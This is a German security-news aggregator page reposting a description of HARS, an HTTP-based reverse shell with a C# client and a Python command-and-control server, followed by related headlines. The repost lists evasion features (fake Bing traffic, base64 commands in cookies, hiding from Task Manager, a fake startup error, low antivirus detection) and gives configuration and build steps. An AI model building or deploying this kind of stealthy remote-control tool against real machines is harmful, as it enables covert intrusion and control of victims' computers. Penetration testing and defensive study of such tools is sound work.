Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ HTTP Asynchronous Reverse Shell - Asynchronous Reverse Shell Using The HTTP Protocol

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š HTTP Asynchronous Reverse Shell - Asynchronous Reverse Shell Using The HTTP Protocol


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


Today there are many ways to create a reverse shell in order to be able to remotely control a machine through a firewall. Indeed, outgoing connections are not always filtered.
However security software and hardware (IPS, IDS, Proxy, AV, EDR...) are more and more powerful and can detect these attacks. Most of the time the connection to a reverse shell is established through a TCP or UDP tunnel.
I figured that the best way to stay undetected would be to make it look like legitimate traffic. The HTTP protocol is the most used by a standard user. Moreover it is almost never filtered so as not to block access to websites.

How it works ?
  1. The client app is executed on the target machine.
  2. The client initiates the connection with the server.
  3. The server accepts the connection.
Then:
-The client queries the server until it gets instructions.
-The attacker provides instructions to the server.
-When a command is defined, the client executes it and returns the result.
And so on, until the attacker decides to end the session.


Disclaimer
This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Make sure you check with your local laws before running this tool.

Features

Today, as a poc, the following functionalities are implemented:
  1. Fake HTTP traffic to appear as searches on bing.com.
  2. Commands are base64 encoded in the HTML response.
  3. The result of the commands is encoded in base64 as a cookie by the client.
  4. [Optional] SSL support; by default it is a fake bing.com certificate.
  5. Random delay between each client call to avoid triggering IDSs.
  6. Random template is used for each response from the server.
  7. Re-use of the same powershell process to avoid triggering EDRs.
  8. Support for all Cmd and Powershell commands.
  9. [Optional] The client can display a fake error message at startup.
  10. The client is hidden from tasks manager.
  11. [Optional] The client can be run as an administrator.

AV Detection
Only 3 out of 69 products were able to detect the client as malicious, without applying any evasive or obfuscation techniques.


Demonstration

Client side


Server side


Configuration

Client : C Sharp
  1. Open HARS.sln in Visual Studio
Config.cs
This file contains parameters ; Assign the values you want :
class Config
{
/* Behavior */
// Display a fake error msg at startup
public static bool DisplayErrorMsg = true;
// Title of fake error msg
public static string ErrorMsgTitle = "This application could not be started.";
// Description of fake error msg
public static string ErrorMsgDesc = "Unhandled exception has occured in your application. \r\r Object {0} is not valid.";
// Min delay between the client calls
public static int MinDelay = 2;
// Max delay between the client calls
public static int MaxDelay = 5;
// Fake uri requested - Warning : it must begin with "search" (or need a change on server side)
public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid=";
/* Listener */
// Hostname/IP of C&C server
public static string Server = "https://12 7.0.0.1";
// Listening port of C&C server
public static string Port = "443";
// Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy
public static bool AllowInsecureCertificate = true;
}
HARS.manifest
Change this line to run by default the client with certain privileges :
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
With
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
or
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
or
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Projet properties
Here you can customize the assembly information and an icon for the file.


Note : Target .NET framework version is set to 4.6 which is available by default in Windows 10.
For Windows 7, choose .NET 3.5 if you don't want to have to install missing features.

Build
Build the project from Visual Studio. The client should be generated in Http Asynchronous Reverse Shell\HARS_Client\HARS\bin\Release folder.
Done!

Server : Python
HARS_Server.py Location : Http Asynchronous Reverse Shell\HARS_Server\www
Simply change the port or location on the certificate if needed in the config section.
# Config
PORT = 443
CERT_FILE = '../server.pem'

Run
python HARS_Server.py

Notes
-HTTP Logs are located in Http Asynchronous Reverse Shell\HARS_Server\logs\
-You can add your own templates (any html page) in Http Asynchronous Reverse Shell\HARS_Server\templates


...



๐Ÿ“Œ HTTP-revshell - Powershell Reverse Shell Using HTTP/S Protocol With AMSI Bypass And Proxy Aware


๐Ÿ“ˆ 32.3 Punkte

๐Ÿ“Œ LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol


๐Ÿ“ˆ 28.78 Punkte

๐Ÿ“Œ Reverse-Shell-Generator - Hosted Reverse Shell Generator With A Ton Of Functionality


๐Ÿ“ˆ 28.21 Punkte

๐Ÿ“Œ Reverse Engineering a DLL Reverse Shell


๐Ÿ“ˆ 21.85 Punkte

๐Ÿ“Œ Desktop components using the Wayland layer-shell protocol


๐Ÿ“ˆ 21.04 Punkte

๐Ÿ“Œ #0daytoday #Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shell [#0day #Exploit]


๐Ÿ“ˆ 20.46 Punkte

๐Ÿ“Œ Sak1To-Shell - Multi-threaded C2 Server And Reverse Shell Client Written In Pure C


๐Ÿ“ˆ 20.46 Punkte

๐Ÿ“Œ Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection


๐Ÿ“ˆ 20.46 Punkte

๐Ÿ“Œ What is bind shell and reverse shell


๐Ÿ“ˆ 20.46 Punkte

๐Ÿ“Œ [shellcode] - Linux x86 Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ [shellcode] - Linux x86 Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ Creating a Windows reverse shell Backdoor using Winspy


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ Create a Reverse Shell Using a Fake MP4 File [Tutorial]


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ GIFShell attack creates reverse shell using Microsoft Teams GIFs


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ How to Create and Use a Reverse Shell Using Metasploit


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ Evilreg - Reverse Shell Using Windows Registry Files (.Reg)


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ GIFShell attack creates reverse shell using Microsoft Teams GIFs


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ Log4Shell campaigns are using Nashorn to get reverse shell on victim's machines, (Mon, Nov 21st)


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ Tornado - Anonymously Reverse Shell Over Tor Network Using Hidden Services Without Portforwarding


๐Ÿ“ˆ 19.22 Punkte

๐Ÿ“Œ TLS Protocol/SSL Protocol RC4 Encryption Bar Mitzvah Attack information disclosure


๐Ÿ“ˆ 19.13 Punkte

๐Ÿ“Œ Medium CVE-2019-12480: Bacnet protocol stack project Bacnet protocol stack


๐Ÿ“ˆ 19.13 Punkte

๐Ÿ“Œ Medium CVE-2020-8597: Point-to-point protocol project Point-to-point protocol


๐Ÿ“ˆ 19.13 Punkte

๐Ÿ“Œ TLS Protocol/DTLS Protocol MAC Check Crafted Packet Lucky Thirteen weak encryption


๐Ÿ“ˆ 19.13 Punkte

๐Ÿ“Œ My Second Tutorial: Using the Fish Shell in Linux . Finally, a shell for the 90's!


๐Ÿ“ˆ 17.84 Punkte

๐Ÿ“Œ Reverse engineered Zhiyun Rider-M / Evo SS BLE protocol with a bonus web app for control


๐Ÿ“ˆ 17.31 Punkte

๐Ÿ“Œ RDP Clients Exposed to Reverse RDP Attacks by Major Protocol Issues


๐Ÿ“ˆ 17.31 Punkte

๐Ÿ“Œ RDP Clients Exposed to Reverse RDP Attacks by Major Protocol Issues


๐Ÿ“ˆ 17.31 Punkte

๐Ÿ“Œ Reverse engineering Logitech mice wireless protocol (nrf24 based)


๐Ÿ“ˆ 17.31 Punkte

๐Ÿ“Œ Automatic Wireless Protocol Reverse Engineering (WOOT'19) [PDF]


๐Ÿ“ˆ 17.31 Punkte

๐Ÿ“Œ Reverse Engineering an IPC Protocol


๐Ÿ“ˆ 17.31 Punkte

๐Ÿ“Œ Reverse Engineering the BMW Connected Apps Protocol


๐Ÿ“ˆ 17.31 Punkte











matomo